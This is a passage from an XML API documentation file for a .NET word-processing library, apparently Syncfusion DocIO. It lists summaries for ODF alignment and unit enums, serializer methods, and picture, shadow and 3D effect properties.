        <member name="F:ODF.Base.TextAreaHAlign.Left">
            <summary>
            Left align.
            </summary>
        </member>
        <member name="F:ODF.Base.TextAreaHAlign.Center">
            <summary>
            Center align.
            </summary>
        </member>
        <member name="F:ODF.Base.TextAreaHAlign.Right">
            <summary>
            Right align.
            </summary>
        </member>
        <member name="F:ODF.Base.TextAreaHAlign.Justify">
            <summary>
            Justify.
            </summary>
        </member>
        <member name="T:ODF.Base.TextAreaVAlign">
            <summary>
            Represents text area vertical alignment.
            </summary>
        </member>
        <member name="F:ODF.Base.TextAreaVAlign.Top">
            <summary>
            Top align.
            </summary>
        </member>
        <member name="F:ODF.Base.TextAreaVAlign.Middle">
            <summary>
            Middle align.
            </summary>
        </member>
        <member name="F:ODF.Base.TextAreaVAlign.Bottom">
            <summary>
            Bottom align.
            </summary>
        </member>
        <member name="F:ODF.Base.TextAreaVAlign.Justify">
            <summary>
            Justify.
            </summary>
        </member>
        <member name="T:ODF.Base.Unit">
            <summary>
            Represents measure units.
            </summary>
        </member>
        <member name="F:ODF.Base.Unit.Automatic">
            <summary>
            Auto.
            </summary>
        </member>
        <member name="F:ODF.Base.Unit.MilliMeter">
            <summary>
            Millimeter (mm).
            </summary>
        </member>
        <member name="F:ODF.Base.Unit.CentiMeter">
            <summary>
            Centimeter (cm).
            </summary>
        </member>
        <member name="F:ODF.Base.Unit.Meter">
            <summary>
            Meter (m).
            </summary>
        </member>
        <member name="F:ODF.Base.Unit.KiloMeter">
            <summary>
            Kilometer (km).
            </summary>
        </member>
        <member name="F:ODF.Base.Unit.Point">
            <summary>
            Point (pt).
            </summary>
        </member>
        <member name="F:ODF.Base.Unit.Pica">
            <summary>
            Pica (pc).
            </summary>
        </member>
        <member name="F:ODF.Base.Unit.Inch">
            <summary>
            Inch (inch).
            </summary>
        </member>
        <member name="F:ODF.Base.Unit.Feet">
            <summary>
            Feet (ft).
            </summary>
        </member>
        <member name="F:ODF.Base.Unit.Mile">
            <summary>
            Mile (mi).
            </summary>
        </member>
        <member name="T:ODF.Base.FillRule">
            <summary>
            Represents how fill property paints the shape.
            </summary>
        </member>
        <member name="F:ODF.Base.FillRule.NonZero">
            <summary>
            if the result is zero then the point is outside the path. Otherwise, it is inside.
            </summary>
        </member>
        <member name="F:ODF.Base.FillRule.EvenOdd">
            <summary>
            If this number is odd, the point is inside; if even, the point is outside.
            </summary>
        </member>
        <member name="T:ODF.Base.StrokeLineCap">
            <summary>
            Represents the shape to be used at the end of open subpaths when they are stroked.
            </summary>
        </member>
        <member name="F:ODF.Base.StrokeLineCap.Butt">
            <summary>
            Butt shape.
            </summary>
        </member>
        <member name="F:ODF.Base.StrokeLineCap.Square">
            <summary>
            Square shape.
            </summary>
        </member>
        <member name="F:ODF.Base.StrokeLineCap.Round">
            <summary>
            Round shape.
            </summary>
        </member>
        <member name="M:ODF.Base.ODFImplementation.OBody.Close">
            <summary>
            Closing the instance
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OTextBodyItem.IsFirstItemOfSection">
            <summary>
            Gets/Sets the Continuous section Textbody first item
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OTextBodyItem.IsLastItemOfSection">
            <summary>
            Gets/Sets the Continuous section Textbody last item
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OTextBodyItem.SectionStyleName">
            <summary>
            Gets/Sets the section style name for the OTextbodyItem
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OParagraph.ListLevelNumber">
            <summary>
            Gets/Sets the list level number for the Paragraph
            </summary>
        </member>
        <member name="F:ODF.Base.ODFImplementation.OPicture.m_widthScale">
            <summary>
             in percent
            </summary>
        </member>
        <member name="F:ODF.Base.ODFImplementation.OPicture.m_heightScale">
            <summary>
             in percent
            </summary>
        </member>
        <member name="M:ODF.Base.ODFImplementation.OPicture.SetWidthScale(System.Single)">
            <summary>
            Sets the width scale, specific for parsers.
            </summary>
            <param name="value">The width scale.</param>
        </member>
        <member name="M:ODF.Base.ODFImplementation.OPicture.SetHeightScale(System.Single)">
            <summary>
            Sets the height scale, specific for parsers.
            </summary>
            <param name="value">The height scale.</param>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OPicture.Height">
            <summary>
            Gets or sets the picture height in points
            </summary>
            <value>The <b>float</b> that specifies the height.</value>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OPicture.Width">
            <summary>
            Gets or sets the picture width in points.
            </summary>
            <value>The <b>float</b> that specifies the width.</value>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OPicture.HeightScale">
            <summary>
            Gets or sets the picture height scale factor in percent.
            </summary>
            <value>The <b>float</b> that specifies the height scale factor.</value>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OPicture.WidthScale">
            <summary>
            Gets or sets the picture width scale factor in percent.
            </summary>
            <value>The <b>float</b> that specifies the width scale factor.</value>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OPicture.Name">
            <summary>
            Gets or sets the name of the picture.
            </summary>
            <value>The <b>string</b> that represents the name.</value>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OPicture.HorizontalPosition">
            <summary>
            Gets or sets absolute horizontal position of the picture in points.
            </summary>
            <value>The <b>float </b> that specifies the horizontal position.</value>
            <remarks>
            The horizontal position is relative to the <see cref="!:WPicture.HorizontalOrigin"/>.
            </remarks>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OPicture.VerticalPosition">
            <summary>
            Gets or sets absolute vertical position of the picture in points.
            </summary>
            <value>The <b>float </b> that specifies the vertical position.</value>
            <remarks>
            The vertical position is relative to the <see cref="!:WPicture.VerticalOrigin"/>.
            </remarks>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OPicture.OrderIndex">
            <summary>
            Gets or sets the index of the order.
            </summary>
            <value>The index of the order.</value>
        </member>
        <member name="P:ODF.Base.ODFImplementation.OPicture.ShapeId">
            <summary>
            Gets or Sets the id to the picture instance
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.HeaderFooterContent.ChildItems">
            <summary>
            Gets the HeaderFooterContent child items
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.INamedObject.Name">
            <summary>
            Gets or sets the name of the object.
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.MasterPage.FooterLeft">
            <summary>
            Gets the Even page footer
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.MasterPage.FirstPageHeader">
            <summary>
            Gets the First page header content
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.MasterPage.FirstPageFooter">
            <summary>
            Gets the First page footer content
            </summary>
        </member>
        <member name="F:ODF.Base.ODFImplementation.MasterPageCollection.m_dictMasterPages">
            <summary>
            Collection of all the styles in the workbook.
            </summary>
        </member>
        <member name="M:ODF.Base.ODFImplementation.MasterPageCollection.Add(ODF.Base.ODFImplementation.MasterPage)">
            <summary>
            Adds specified style into this collection.
            </summary>
            <param name="style">Style that must be added.</param>
        </member>
        <member name="F:ODF.Base.ODFImplementation.ODFStyleCollection.m_dictStyles">
            <summary>
            Collection of all the styles in the workbook.
            </summary>
        </member>
        <member name="M:ODF.Base.ODFImplementation.ODFStyleCollection.Add(ODF.Base.ODFImplementation.ODFStyle)">
            <summary>
            Adds specified style into this collection.
            </summary>
            <param name="style">Style that must be added.</param>
        </member>
        <member name="M:ODF.Base.ODFImplementation.ODFStyleCollection.Add(ODF.Base.ODFImplementation.ODFStyle,System.Int32)">
            <summary>
            Adds specified style into this collection.
            </summary>
            <param name="style">Style that must be added.</param>
        </member>
        <member name="P:ODF.Base.ODFImplementation.PageLayout.ColumnsCount">
            <summary>
            Gets/Sets the current page layout columns count
            </summary>
        </member>
        <member name="P:ODF.Base.ODFImplementation.PageLayout.ColumnsGap">
            <summary>
            Gets/Sets the current page layout columns gap
            </summary>
        </member>
        <member name="F:ODF.Base.ODFImplementation.PageLayoutCollection.m_dictStyles">
            <summary>
            Collection of all the styles in the workbook.
            </summary>
        </member>
        <member name="M:ODF.Base.ODFImplementation.PageLayoutCollection.Add(ODF.Base.ODFImplementation.PageLayout)">
            <summary>
            Adds specified style into this collection.
            </summary>
            <param name="style">Style that must be added.</param>
        </member>
        <member name="F:ODF.Base.ODFSerialization.ODFConstants.FirstVisibleChar">
            <summary>
            First visible character.
            </summary>
        </member>
        <member name="F:ODF.Base.ODFSerialization.ODFConstants.allowedChars">
            <summary>
            Chars with codes less than 0x20 which are allowed to be used inside xml strings.
            </summary>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SaveDocument(System.IO.Stream)">
            <summary>
            Saves the document to ODS format.
            </summary>
            <param name="fileName"></param>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializeDocumentManifest">
            <summary>
            Serializes doument manifest which specifies the files in the arhive.
            </summary>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializeMimeType">
            <summary>
            Serializes the mimetype value.
            </summary>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializeMetaData">
            <summary>
            Serializes meta data file.
            </summary>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializeList(ODF.Base.ODFImplementation.OParagraph,System.Collections.Generic.Stack{System.Int32}@,System.String@)">
            <summary>
            Serialize the list elements
            </summary>
            <param name="paragraph"></param>
            <param name="listStack"></param>
            <param name="m_previousParaListStyleName"></param>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializeTableOfContentSource">
            <summary>
            To serialize TOC source entries
            </summary>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializePicture(ODF.Base.ODFImplementation.OPicture)">
            <summary>
            Serialize OPicture instance
            </summary>
            <param name="picture"></param>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializeMergeField(ODF.Base.ODFImplementation.OMergeField)">
            <summary>
            Serialize Merge Field
            </summary>
            <param name="mergeField">The Merge Field</param>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializeDateTimeField(ODF.Base.ODFImplementation.OField)">
            <summary>
            Serialize Merge Field
            </summary>
            <param name="mergeField">The Merge Field</param>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializeHyperlink(ODF.Base.ODFImplementation.OField)">
            <summary>
            Serialize hyperlink field
            </summary>
            <param name="mergeField">The Field</param>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializeDefaultParagraphProperties(ODF.Base.ODFImplementation.ODFParagraphProperties)">
            <summary>
            Document default Paragraph properties
            </summary>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializeDefaultTextProperties(ODF.Base.ODFImplementation.TextProperties)">
            <summary>
            Document Default Text properties
            </summary>
        </member>
        <member name="M:ODF.Base.ODFSerialization.ODFWriter.SerializeHeaderFooter(ODF.Base.ODFImplementation.HeaderFooterContent,System.Boolean)">
            <summary>
            Serializes teh Odd/First Page HeaderFooter contents
            </summary>
            <param name="headerFooter"></param>
        </member>
        <member name="T:Syncfusion.DocIOBaseAssembly">
            <exclude/>
             <summary>
             This class holds the name of the Syncfusion.DocIO.Base assembly and provides a helper 
             routine that helps with resolving types when loading a serialization stream and when 
             the framework probes for assemblies by reflection. 
             </summary>
        </member>
        <member name="F:Syncfusion.DocIOBaseAssembly.Name">
            <summary>
            The full name of this assembly without version information: "Syncfusion.DocIO.Base".
            </summary>
        </member>
        <member name="F:Syncfusion.DocIOBaseAssembly.Assembly">
            <summary>
            A reference to the <see cref="T:System.Reflection.Assembly"/> for the DocIO assembly.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIOBaseAssembly.RootNamespace">
            <summary>
            The root namespace of this assembly. Used internally for locating resources within the assembly.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.AssemblyInfo">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DocIOConfig">
            <summary>
            Configuration class for the DocIO library. In the current version, there are no explicit settings.
            Adding this component from the toolbar allows you to easily configure your project for MS Word support.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DocIOConfig.Copyright">
            <summary>
            Copyright notice for the library.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.AutoShapeHelper.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EffectFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.IsShadowEffect">
            <summary>
            Flag to identify the shadow effect
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.IsGlowEffect">
            <summary>
            Flag to identify the glow effect
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.IsReflection">
            <summary>
            Flag to identify the reflection effect
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.IsSoftEdge">
            <summary>
            Flag to identify the soft edges effect
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.NoSoftEdges">
            <summary>
            Flag to state there is no soft edges
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.IsSceneProperties">
            <summary>
            Flag to identify the ThreeD Scene effect
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.IsShapeProperties">
            <summary>
            Flag to identify the ThreeD shape effects
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.IsEffectListItem">
            <summary>
            Flag to state the shape contains effect list
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.ShadowFormat">
            <summary>
            Holds the shadow properties of the shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.GlowFormat">
            <summary>
            Holds the glow properties of the shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.ThreeDFormat">
            <summary>
            Holds the ThreeD properties of the shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.ReflectionFormat">
            <summary>
            Holds the reflection properties of the shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.SoftEdgeRadius">
            <summary>
            Holds the soft edge radius
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EffectFormat.DocxProps">
            <summary>
            Collection to maintain the effect extensions
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShadowFormat.ShadowOffsetXKey">
            <summary>
            Keys.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShadowFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShadowFormat.HasKey(System.Int32)">
            <summary>
            Check for the property key from the property collection
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShadowFormat.Clone">
            <summary>
            Clones this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.ShadowOffsetX">
            <summary>
            Holds the shadow Offset X
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.ShadowOffsetY">
            <summary>
            Holds the shadow Offset Y
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.ShadowOffset2X">
            <summary>
            Holds the Shadow Secondary Offset X
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.ShadowOffset2Y">
            <summary>
            Holds the Shadow Secondary Offset Y
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.OriginX">
            <summary>
            Holds the Shadow Origin X
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.OriginY">
            <summary>
            Holds the Shadow Origin Y
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.ShadowPerspectiveMatrix">
            <summary>
            Holds the Shadow Matrix
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.HorizontalSkewAngle">
            <summary>
            Holds the Horizontal Skew Angle
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.VerticalSkewAngle">
            <summary>
            Holds the Vertical Skew Angle
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.HorizontalScalingFactor">
            <summary>
            Holds the Horizontal Scaling Factor
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.VerticalScalingFactor">
            <summary>
            Holds the Vertical Scaling Factor
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.RotateWithShape">
            <summary>
            Either to rotate the shadow effect along with shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.Direction">
            <summary>
            Holds the Direction angle
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.Distance">
            <summary>
            Holds the Distance of shadow from the shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.Blur">
            <summary>
            Holds the Blur radius of the shadow
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.Alignment">
            <summary>
            Holds the Shadow alignment
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.Color">
            <summary>
            Holds the shadow color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.Color2">
            <summary>
            Holds the shadow back color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.Name">
            <summary>
            Holds the name of the shape for which the shadow effect has been applied
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.ShadowType">
            <summary>
            Conveys the type of the shadow applied
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.Visible">
            <summary>
            Flag to denote the shadow visiblity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.Transparency">
            <summary>
            Holds the value of the shadow opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShadowFormat.Obscured">
            <summary>
            Flag to denote the shadow transparency to be applied
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ThreeDFormat.Clone">
            <summary>
            Clones this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ContourWidth">
            <summary>
            Holds the value for the ThreeD Contour Width.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ExtrusionHeight">
            <summary>
            Holds the value for the ThreeD Extrusion height.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.PresetMaterialType">
            <summary>
            Tells about the ThreeD Material Type
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.DistanceFromGround">
            <summary>
            Holds the distance of the ThreeD effect from the shape's ground.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BevelBottomHeight">
            <summary>
            Holds the value for the Bevel Bottom Height.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BevelBottomWidth">
            <summary>
            Holds the value for the Bevel Bottom Width.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BevelBPresetType">
            <summary>
            Bevel Bottom Preset Type
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BevelTopHeight">
            <summary>
            Holds the value for Bevel Top Height.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BevelTopWidth">
            <summary>
            Holds the value for the Bevel Top Width.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BevelTPresetType">
             <summary>
            Bevel Top Preset Type
             </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ContourColor">
            <summary>
            Holds the color of the contour.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ContourOpacity">
            <summary>
            Holds the Contour opacity value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ExtrusionColor">
            <summary>
            Holds the Extrusion Color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ExtrusionOpacity">
            <summary>
            Holds the Extrusion Opacity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BackdropAnchorX">
            <summary>
            Holds the value of Backdrop's Anchor X'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BackdropAnchorY">
            <summary>
            Holds the value of Backdrop's Anchor Y'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BackdropAnchorZ">
            <summary>
            Holds the value of Backdrop's Anchor Z'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BackdropNormalX">
            <summary>
            Holds the value of Backdrop's Normal X'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BackdropNormalY">
            <summary>
            Holds the value of Backdrop's Normal Y'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BackdropNormalZ">
            <summary>
            Holds the value of Backdrop's Normal Z'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BackdropUpX">
            <summary>
            Holds the value of Backdrop's Up X'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BackdropUpY">
            <summary>
            Holds the value of Backdrop's Up Y'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BackdropUpZ">
            <summary>
            Holds the value of Backdrop's Up Z'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.FieldOfView">
            <summary>
            Holds the view value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.CameraPresetType">
            <summary>
            Camera preset type
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.Zoom">
            <summary>
            Holds the value for percentage
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.CameraRotationX">
            <summary>
            Holds the value of camera rotaton X'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.CameraRotationY">
            <summary>
            Holds the value of camera rotaton Y'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.CameraRotationZ">
            <summary>
            Holds the value of camera rotaton Z'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightRigType">
            <summary>
            LightRig type
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightRigDirection">
             <summary>
            LigthRig Direction
             </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightRigRotationX">
            <summary>
            Holds the value of lightrig rotaton X'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightRigRotationY">
            <summary>
            Holds the value of lightrig rotaton Y'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightRigRotationZ">
            <summary>
            Holds the value of lightrig rotaton Z'axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.Brightness">
            <summary>
            Brightness value for ThreeD effect
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ColorMode">
            <summary>
            Holds the value of color mode
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.Diffusity">
            <summary>
            Holds the value for diffusity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.Edge">
            <summary>
            Holds the value of Edge
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.Facet">
            <summary>
            Holds the value of Facet
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ForeDepth">
            <summary>
            Fore Depth value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.BackDepth">
            <summary>
            Back Depth value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightLevel">
            <summary>
            Light Level value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightLevel2">
            <summary>
            Secondary Light Level value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightRigRotation2X">
            <summary>
            LightRig secondary rotation x axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightRigRotation2Y">
            <summary>
            LightRig secondary rotation y axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightRigRotation2Z">
            <summary>
            LightRig secondary rotation z axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.RotationX">
            <summary>
            Rotation x axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.RotationY">
            <summary>
            Rotation y axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.RotationZ">
            <summary>
            Rotation z axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.OrientationAngle">
            <summary>
            Rotation Orientation angle
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ExtrusionPlane">
            <summary>
            Extrusion Plane type
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ExtrusionType">
            <summary>
            Extrusion Tyoe
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ExtrusionRenderMode">
            <summary>
            Extrusion Rendering mode
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.RotationAngleX">
            <summary>
            Rotation angle x axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.RotationAngleY">
            <summary>
            Rotation angle y axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.RotationCenterX">
            <summary>
            Rotation Center x axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.RotationCenterY">
            <summary>
            Rotation Center y axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.RotationCenterZ">
            <summary>
            Rotation center z axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.Shininess">
            <summary>
            Value of Shininess
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.SkewAmount">
            <summary>
            Skew Amount
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.SkewAngle">
            <summary>
            Skew Angle
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.Specularity">
            <summary>
            Value for Specularity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ViewPointX">
            <summary>
            View Point X axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ViewPointY">
            <summary>
            View Point Y axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ViewPointZ">
            <summary>
            Rotation Z axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ViewPointOriginX">
            <summary>
            View Point Origin x axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.ViewPointOriginY">
            <summary>
            View Point Origin Y axis
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.Visible">
            <summary>
            Boolean flag for ThreeD Effect Visiblity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightFace">
            <summary>
            Boolean flag for Light face
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightHarsh">
            <summary>
            Boolean flag for Light harsh
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LightHarsh2">
            <summary>
            Boolean flag for secondary light harsh
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.LockRotationCenter">
            <summary>
            Flag to lock the rotaion center
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.Metal">
            <summary>
            Boolean flag to apply metal effect
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.AutoRotationCenter">
            <summary>
            Boolean flag for auto rotation center
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.Extension">
             <summary>
            Extrusion string
             </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.HasBackdropEffect">
            <summary>
            To Convey the shape has back drop effect
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.HasCameraEffect">
            <summary>
            To Convey the shape has camera effect
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.HasLightRigEffect">
            <summary>
            To Convey the shape has light rig effect
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.HasBevelBottom">
            <summary>
            To Convey the shape has bevel bottom
            </summary>
        </member>
